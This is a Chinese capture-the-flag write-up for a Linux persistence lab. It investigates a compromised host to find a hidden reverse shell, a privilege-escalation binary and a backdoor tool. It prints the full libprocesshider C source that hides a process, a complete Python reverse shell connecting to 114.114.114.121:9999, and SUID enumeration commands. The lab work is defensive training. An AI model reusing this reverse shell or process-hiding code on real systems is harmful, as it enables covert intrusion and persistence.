第三章 权限维持-linux权限维持-隐藏-玄机靶场
linux权限维持玄机靶场自用笔记。
本篇文章来自lexsd6's home 师傅的分享,如有侵权请联系
题目简介
1.黑客隐藏的隐藏的文件 完整路径md5
2.黑客隐藏的文件反弹shell的ip+端口 {ip:port}
3.黑客提权所用的命令 完整路径的md5 flag{md5}
4.黑客尝试注入恶意代码的工具完整路径md5
5.使用命令运行 ./x.xx 执行该文件 将查询的 Exec****** 值 作为flag提交 flag{/xxx/xxx/xxx}1.黑客隐藏的隐藏的文件 完整路径md5
进入查询,发现vim的记录文件 .viminfo 读取它发现几个有意识到路径
Command Line History (newest to oldest):
:q!
:q
:wq
# Search String History (newest to oldest):
# Expression History (newest to oldest):
# Input Line History (newest to oldest):
# Input Line History (newest to oldest):
# Registers:
# File marks:
'0 1 0 /tmp/.temp/libprocesshider/1.py
'1 4 0 /tmp/.temp/libprocesshider/1.py
'2 12 40 /tmp/.temp/libprocesshider/processhider.c
'3 24 47 /tmp/.temp/libprocesshider/1.py
'4 2 1 /var/www/html/sh.php发现libprocesshider 是一个Linux 持久性訪問到工具,1.py是这个工具所产生的执行文件。对这个目录文件 /tmp/.temp/libprocesshider/1.py 加密,提交 flag{109ccb5768c70638e24fb46ee7957e37}
2.黑客隐藏的文件反弹shell的ip+端口 {ip:port}
进行分析/tmp/.temp/libprocesshider/下的文件:
root@xuanji:~# cat /tmp/.temp/libprocesshider/processhider.c
#define _GNU_SOURCE
#include <stdio.h>
#include <dlfcn.h>
#include <dirent.h>
#include <string.h>
#include <unistd.h>
/*
* Every process with this name will be excluded
*/
static const char* process_to_filter = "1.py";
/*
* Get a directory name given a DIR* handle
*/
static int get_dir_name(DIR* dirp, char* buf, size_t size)
{
int fd = dirfd(dirp);
if(fd == -1) {
return 0;
}
char tmp[64];
snprintf(tmp, sizeof(tmp), "/proc/self/fd/%d", fd);
ssize_t ret = readlink(tmp, buf, size);
if(ret == -1) {
return 0;
}
buf[ret] = 0;
return 1;
}
/*
* Get a process name given its pid
*/
static int get_process_name(char* pid, char* buf)
{
if(strspn(pid, "0123456789") != strlen(pid)) {
return 0;
}
char tmp[256];
snprintf(tmp, sizeof(tmp), "/proc/%s/stat", pid);
FILE* f = fopen(tmp, "r");
if(f == NULL) {
return 0;
}
if(fgets(tmp, sizeof(tmp), f) == NULL) {
fclose(f);
return 0;
}
fclose(f);
int unused;
sscanf(tmp, "%d (%[^)]s", &unused, buf);
return 1;
}
#define DECLARE_READDIR(dirent, readdir) \
static struct dirent* (*original_##readdir)(DIR*) = NULL; \
\
struct dirent* readdir(DIR *dirp) \
{ \
if(original_##readdir == NULL) { \
original_##readdir = dlsym(RTLD_NEXT, #readdir); \
if(original_##readdir == NULL) \
{ \
fprintf(stderr, "Error in dlsym: %s\n", dlerror()); \
} \
} \
\
struct dirent* dir; \
\
while(1) \
{ \
dir = original_##readdir(dirp); \
if(dir) { \
char dir_name[256]; \
char process_name[256]; \
if(get_dir_name(dirp, dir_name, sizeof(dir_name)) && \
strcmp(dir_name, "/proc") == 0 && \
get_process_name(dir->d_name, process_name) && \
strcmp(process_name, process_to_filter) == 0) { \
continue; \
} \
} \
break; \
} \
return dir; \
}
DECLARE_READDIR(dirent64, readdir64);
DECLARE_READDIR(dirent, readdir);
root@xuanji:~#
root@xuanji:~# cat /tmp/.temp/libprocesshider/1.py
#!/usr/bin/python3
import socket,subprocess,os,sys, time
pidrg = os.fork()
if pidrg > 0:
sys.exit(0)
os.chdir("/")
os.setsid()
os.umask(0)
drgpid = os.fork()
if drgpid > 0:
sys.exit(0)
while 1:
try:
sys.stdout.flush()
sys.stderr.flush()
fdreg = open("/dev/null", "w")
sys.stdout = fdreg
sys.stderr = fdreg
sdregs=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sdregs.connect(("114.114.114.121",9999))
os.dup2(sdregs.fileno(),0)
os.dup2(sdregs.fileno(),1)
os.dup2(sdregs.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])
sdregs.close()
except Exception:
pass
time.sleep(2)
root@xuanji:~#发现在1.py 提到一个sdregs.connect(("114.114.114.121",9999)) ,flag{114.114.114.121:9999}
3.黑客提权所用的命令
用命令查询find / -perm -u=s -type f 2>/dev/null ,suid提权查询
root@xuanji:/tmp/.temp/libprocesshider# find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/ping
/bin/ping6
/bin/su
/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/find
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/sudo
/usr/lib/eject/dmcrypt-get-device发现find 可以进行
故flag为 /usr/bin/find md5加密,提交 flag{7fd5884f493f4aaf96abee286ee04120}
4.黑客尝试注入恶意代码的工具
执行find / -name '.*'查询隐藏文件。
/etc/.pwd.lock
/etc/cron.d/.placeholder
/etc/cron.daily/.placeholder
/etc/cron.hourly/.placeholder
/etc/cron.monthly/.placeholder
/etc/cron.weekly/.placeholder
/etc/init.d/.legacy-bootordering
/etc/skel/.bash_logout
/etc/skel/.bashrc
/etc/skel/.profile
/home/ctf/.bash_logout
/home/ctf/.bashrc
/home/ctf/.profile
/home/ctf/.bash_history
/opt/.cymothoa-1-beta发现一个奇怪的目录/opt/.cymothoa-1-beta,cd 进去发现是一个工具目录:
root@xuanji:/opt/.cymothoa-1-beta# ls
Makefile bgrep.c cymothoa cymothoa.h payloads personalization.h syscalls.txt udp_server.c
bgrep core cymothoa.c hexdump_to_cstring.pl payloads.h syscall_code.pl udp_server查询发现是一个后门隐藏工具。
故, /opt/.cymothoa-1-beta/cymothoa 加密,提交 flag{087c267368ece4fcf422ff733b51aed9}
5.使用命令运行 ./x.xx 执行该文件 将查询的 Exec** 值 作为flag提交
Cat 查看1.py:
root@xuanji:/opt/.cymothoa-1-beta# cat /tmp/.temp/libprocesshider/1.py
#!/usr/bin/python3
import socket,subprocess,os,sys, time发现默认是“#!/usr/bin/python3” ,即pyton3运行1.py,
root@xuanji:~# python3 /tmp/.temp/libprocesshider/1.py
root@xuanji:~# netstat -alntp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 11/apache2
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 10/sshd
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 1 10.244.6.152:46896 114.114.114.121:9999 SYN_SENT 19439/python3
tcp 0 1 10.244.6.152:48628 114.114.114.121:9999 SYN_SENT -
tcp 0 0 10.244.6.152:22 10.244.0.1:63226 ESTABLISHED 393/1
tcp 0 1 10.244.6.152:48618 114.114.114.121:9999 SYN_SENT -
tcp 0 1 10.244.6.152:40544 114.114.114.121:9999 SYN_SENT -
tcp 0 0 10.244.6.152:22 10.244.0.1:4984 ESTABLISHED 9187/sshd: root@not
tcp6 0 0 :::22 :::* LISTEN 10/sshd
root@xuanji:~# whereis /python3
python3: /usr/bin/python3 /usr/bin/python3.4 /usr/bin/python3.4m /etc/python3 /etc/python3.4 /usr/lib/python3 /usr/lib/python3.4 /usr/local/lib/python3.4 /usr/share/python3 /usr/share/man/man1/python3.1.gz
root@xuanji:~#ls -lab /usr/bin/python3
lrwxrwxrwx. 1 root root 9 Mar 23 2014 /usr/bin/python3 -> python3.4where查询python3 位置,最后发现链接到 /usr/bin/python3.4
按题目要求提供完整的执行程序为flag :flag{/usr/bin/python3.4}